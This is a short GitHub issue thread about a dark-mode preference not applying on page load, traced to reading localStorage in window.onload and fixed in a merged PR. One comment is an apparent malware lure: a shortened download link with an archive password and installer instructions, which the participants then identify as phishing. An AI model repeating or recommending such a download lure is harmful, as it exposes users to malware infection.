### ISSUE TITLE
Dark mode on page reload or initial load

### ISSUE THREAD

**Issue by Sudharshaun** [Buzzpy/Dev-Encyclopedia#115]
## Issue:
When the page is reloaded or loaded for the first time, even if we have enabled dark mode in the past, the page still loads into Light mode.
[darkmode_pageload_issue.webm](https://github.com/user-attachments/assets/0e94415c-ac72-4d53-82ff-e2aea85a247e)

## RCA:
The darkMode property is set in `localStorage` and read from `localStorage` on `window.onload` event which gets triggerd after the resources are downloaded and loaded into storage system. Rather than using `window.onload`, adding the functionality in `DOMContentLoaded` event should solve the problem.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Sudharshaun** [comment]
Update: PR to fix this issue #114

**Comment by RayMathew** [comment]
> bit.ly/3MjP129

@c0ffincolors what is this about? The link is giving a warning.

**Comment by Sudharshaun** [comment]
@RayMathew Looks like a phishing attack, the link got blocked by bitly. Probably account got hacked.

**Comment by Sudharshaun** [comment]
#114 has been merged, hence closing the issue.
